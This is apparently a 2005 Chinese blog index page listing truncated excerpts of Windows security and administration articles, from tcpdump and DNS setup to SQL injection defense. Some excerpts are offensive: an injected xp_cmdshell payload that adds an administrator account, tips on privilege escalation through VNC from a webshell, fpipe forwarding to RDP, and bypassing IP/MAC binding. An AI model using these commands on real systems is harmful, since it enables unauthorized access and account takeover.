windows系统
psyl
http://blog.csdn.net/psyl
展开
-
渗透攻击(NT/2000系统)
来源: http://xiaomutou.51.net/ciker/blog/ 1.什么叫渗透攻击: 简单的说就是被黑主机没有明显的系统漏洞,利用同一 网段下其它主机的问题将它洗白。 核心技术是: 1:交换与非交换环境下的数据嗅探, 2:对于LINXU/UNIX系统还有IP欺骗。 2.攻击流程: 扫描主机(判断系统类型,是否打开ftp,telnet,是否使用ssh) | 扫描同一子网其它主机(找到原创 2005-03-16 08:02:00 · 1292 阅读 · 0 评论 -
网络协议图
原创 2005-03-30 16:02:00 · 1228 阅读 · 0 评论 -
禁用“命令提示符”
南方网讯 在Windows 2000/XP操作系统的"开始→附件"中有一个"命令提示符"的菜单命令,不过你是否注意过它也会成为系统的一个安全隐患呢? 原来,进入命令提示符环境后,可以运行一些命令以窥视你的隐私或者窃取文件,例如访问已隐藏的某个分区。有些病毒或者黑客程序也是通过"命令提示符"来入侵的,由于运行时并不会出现相应的界面,而只是一闪而过,因此很容易被用户所忽略。这样看来,要想杜 绝这个原创 2005-04-02 10:56:00 · 3851 阅读 · 0 评论 -
2000 Server 系统安全完全配置方案
Windows Server 2003作为Microsoft 最新推出的服务器操作系统,不仅继承了Windows 2000/XP的易用性和稳定性,而且还提供了更高的硬件支持和更加强大的安全功能,无疑是中小型网络应用服务器的当然之选。本文就Windows 2003在企业网络应用中企业帐户和系统监控方面的安全策略制定作出一些说明,希望能对大家起到抛砖引玉的效果,最终的目标是确保我们的网络服务器的正常运原创 2005-04-02 11:18:00 · 1459 阅读 · 0 评论 -
利器Tcpdump的使用
tcpdump采用命令行方式,它的命令格式为: tcpdump [ -adeflnNOpqStvx ] [ -c 数量 ] [ -F 文件名 ] [ -i 网络接口 ] [ -r 文件名] [ -s snaplen ] [ -T 类型 ] [ -w 文件名 ] [表达式 ] 1. tcpdump的选项介绍 -a 将网络地址和广播地址转变成名字;原创 2005-04-03 19:55:00 · 2084 阅读 · 0 评论 -
登陆SERV-U FTP的提示信息
登陆SERV-U FTP的提示信息 登陆SERV-U FTP的提示信息 现在很多的朋友都用SERV-U做个人FTP的服务器,有关如何使用SERV-U架设服务器的文章很多了,这儿我就不多说了。不过大家不知道注意到了没有,当你登陆很多FTP的时候,会显示一些欢迎信息,比如说显示你的IP,告诉你目前有多少人在使用FTP,带宽是多少等等。。。看起来就比较的专业样子。其实你自己也是可以做的,SERV-U这个原创 2005-04-02 08:28:00 · 1487 阅读 · 1 评论 -
谈谈IP和MAC捆绑的破解之道
文章来源:黑客基地 我们学校最近将MAC和IP进行了捆绑,又在服务器(2K)上进行了上网时间的限制,真是烦死人了,我想我可是一个从不受限制的人啊,怎么可以就这样束手就擒呢!古话说得好"上有政策,下有对策",那我就来干掉它,说干就干。 原理如下: MAC和IP捆绑是在服务器上,那么大家想想,作用范围应该是什么呢?当然也只有在服务器对客户机上了,但是如果我修改了客户机上的IP,那服务器上的怎样呢?如果原创 2005-04-09 20:38:00 · 1418 阅读 · 0 评论 -
SQL注入防御方法-程序员篇
作者:NB联盟-小竹 ps:老东西了,没别的意思。对曾经促进过网络安全事业的54nb的一点怀念吧! SQL注入越来越多的被利用来入侵网站,部分WEB程序员也开始关注这方面的知识,但由于对入侵的方法一知半解,导致在过滤的时候漏掉某些字符,造成安全漏洞;或者是草木皆兵,把一些合法的用户请求都拒之门外,试想一下,当用户想输入个Im a boy的时候,却给你臭骂一顿,他还会愿意再上你的网站吗? 下面,原创 2005-04-09 22:28:00 · 1737 阅读 · 0 评论 -
修改XP开机画面最简单办法
最新发现一个通过修改Boot.ini文件以修改Windoows XP的开机画面的技巧 第一步:建立自己的开机画面 做此开机画面的图片要求:图片取名为Boot.bmp,大小640*480,16色的bmp位图,保存在系统盘的windows目录下。 建议在Photoshop中新建一个大小640*480全黑的图层做背景,然后将自己喜欢的图片放到黑色的图层上。图片模式改为索引。保存时选择16色(即4位原创 2005-04-10 08:18:00 · 2026 阅读 · 2 评论 -
SQL Server 提升权限相关命令及防范
SQL Server 提升权限相关命令及防范;exec master..xp_cmdshell "net user name password /add"--;exec master..xp_cmdshell "net localgroup administrators name /add"--程序代码开启cmdshell的SQL语句EXEC sp_addextendedproc xp_cmdsh原创 2005-04-10 08:20:00 · 1526 阅读 · 0 评论 -
X-Scan-v3.2-beta
来自:http://www.xfocus.net/提交时间:2005-03-28提交用户:glacier工具分类:扫 描 器运行平台:Windows工具大小:9035267 Bytes文件MD5 :ce78de3bc0130a6b5f1630b6a8511e98工具来源:http://www.xfocus.org升级攻击脚本引擎至nasl 2.2.4版本新增TELNET/SSH/HTTP/CVS/原创 2005-03-29 10:46:00 · 2096 阅读 · 2 评论 -
微软新系统 Windows Longhorn 长牛角
预计在最近的几年里,Windows*作系统的下一版本——代号“长角”还很难能够顺利面世。但是在最近,微软公司却很“慷慨”的公布了更多关于这款*作系统的细节。从所公布的信息来看,新版本的*作系统将会在原有的基础上有了非常明显的升级。 无论来自于那个渠道的消息都显示说,Windows*作系统下一个版本的面世还要经过很长的时间。这款代号为“长角”的*作系统,预计要到2006年才有可能正式发布。自从今年年原创 2005-03-29 10:32:00 · 3363 阅读 · 1 评论 -
Win2003上网配置DNS的技巧
来源:http://www.enet.com.cn本文分步说明如何在Windows Server 2003 产品中为域名系统 (DNS) 配置Internet 访问。DNS是Internet上使用的核心名称解析工具。负责主机名称和Internet 地址之间的解析。 如何从运行 Windows Server 2003 的独立服务器开始 运行Windows Server 2003 的独立服务器原创 2005-04-08 07:47:00 · 2259 阅读 · 0 评论 -
命令行下修改文件访问控制权限
命令行下修改文件访问控制权限随着Windows XP/Server 2003的流行,越来越多的用户开始选择NTFS文件系统,NTFS的好处自然是大大增强了系统的安全性,在“安全”标签页下,我们可以在这里为不同级别的用户设置相应的访问控制权限,包括完全控制、修改、读取和运行、列出文件夹目录、读取、写入、特别的权限等,你只需要在“允许”和“拒绝”下简单勾选即可,点击“高级”按钮还可以设置更多的特殊权限原创 2005-03-18 15:16:00 · 1632 阅读 · 0 评论 -
ARP、Tracert、Route 与 NBTStat命令详解
来源;天极网ARP ARP是一个重要的TCP/IP协议,并且用于确定对应IP地址的网卡物理地址。实用arp命令,我们能够查看本地计算机或另一台计算机的ARP高速缓存中的当前内容。此外,使用arp命令,也可以用人工方式输入静态的网卡物理/IP地址对,我们可能会使用这种方式为缺省网关和本地服务器等常用主机进行这项作,有助于减少网络上的信息量。 按照缺省设置,ARP高速缓存中的项目是动态的,每当发送原创 2005-03-19 16:16:00 · 2619 阅读 · 0 评论 -
关掉Windows 2000不必要的服务(推荐)
来源: http://www.17nc.comWindows 2000的启动时间比Windows 98、Me长得多了,特别是在只有64兆内存的情况下尤为明显,你会看到你的硬盘在启动时不停地读写,因为这时Windows 2000在加载很多服务组件,如果你只是在一台单机上用Windows 2000,并且没有连到任何局域网上,那么其实有很多服务组件是根本不需要的,额外的服务程序当然大大拖慢系统的速度了,原创 2005-03-16 08:05:00 · 1545 阅读 · 0 评论 -
手工删除Win2000/XP/2003中的guest账号
作者:孤独剑客我们知道,在NT技术架构的Windows系统中,有一个系统内置的权限较低的匿名访问账号guest,我们经常会遇到在win2000和xp系统中设置了共享目录但别人却没法访问的情况,主要原因就是系统禁用了guest账号,只需启用该账号即可。但是由于该账号的存在往往会给系统的安全带来危害,比如:别人偷偷把你的guest激活后作为后门账号使用,更隐蔽的是直接克隆成了管理员账号,基于大多情况下原创 2005-03-16 08:07:00 · 1172 阅读 · 0 评论 -
Fpipe VS HttpTunnel
作者:sky http://sky.hackvip.cn/通过前几天 对Fpipe 和 HttpTunnel 两个软件的试验(和lake2讨论下 他也没有连接成功过 郁闷) 我还是觉得Fpipe好些 下面说下结果: 先说说基本用法FPIPE(远程主机执行):fpipe.exe -l 80 -r 3389 192.168.63.82 最好不要加上-S参数 那样会很慢DI 执行后 用3389登陆器原创 2005-03-17 17:36:00 · 1524 阅读 · 0 评论 -
Win2003作路由 局域网共享多出口上网
一、案例 本校计算机中心机房共有计算机240台,已互连为局域网,希望访问校内资源时通过校园网接口,而访问外部资源时通过ADSL接口。 二、解决 Windows XP和Windows 2003都自带ADSL宽带拨号程序,这里只要使用Windows 2003的“路由和远程访问”程序稍加配置,就可搞掂一切。 1、前提 计算机一台(配置不用很高,只要能安装Windows 2003就行),安装有原创 2005-03-23 19:55:00 · 1421 阅读 · 0 评论 -
一位高手整理的IIS FAQ
真的是高手`强`顶` 下面是一位高手整理的问题精华,大家好好看看吧,收获肯定很大的! 1.如何让asp脚本以system权限运行? 修改你asp脚本所对应的虚拟目录,把"应用程序保护"修改为"低".... 2.如何防止asp木马? 基于FileSystemObject组件的asp木马 cacls %systemroot%/system32/scrrun.dll /e /d gu原创 2005-03-23 20:16:00 · 1836 阅读 · 0 评论 -
如何利用VNC服务提升权限
作者:小花很多时候大家提升权限一般用SERVU,或是找到sa帐户密码等。其实除了这个VNC一般也是以最高权限运行的,而且是图形界面,功能和远程终端类似。如果得到了一个主机的WEBSHELL,想提升权限,发现主机运行了VNC服务,就可以考虑用下面的方法。默认情况下VNC服务端的密码是放在注册表中的,本文只针对这种情况。首先用ASP读出注册表中的加密密码,然后用破解工具破解。我给出大家一个读取VNC密原创 2005-03-23 20:14:00 · 3490 阅读 · 0 评论 -
使用IP地址来禁止内部用户上网
在ISA Server 2004中,禁止客户上网是很简单的事情,你可以通过禁止IP和禁止用户两方面来进行设置。这篇文章中讨论的是使用IP地址来禁止某些客户上网,适合于IP地址固定的环境。 至于如何使用身份验证来禁止用户上网,会在本站的另外一篇文章“How to :使用身份验证来禁止内部用户上网”中进行介绍。 在访问规则的设置上,又可以分为隐性禁止和显式禁止两种。隐性禁止就是不明确允许客户访问外部原创 2005-03-23 20:00:00 · 3176 阅读 · 0 评论 -
Q&A邀请,数量有限,确实有需要的朋友进。
有需要的,请说需求原因,不清楚Q&A是做什么的就不要开口了,谢谢。另: 百度指数我暂时还不能邀请别人。 主题: Youve been gifted invites to send to your friends and familySpread the news ! You have just been granted invitatio原创 2006-08-02 16:41:00 · 1574 阅读 · 2 评论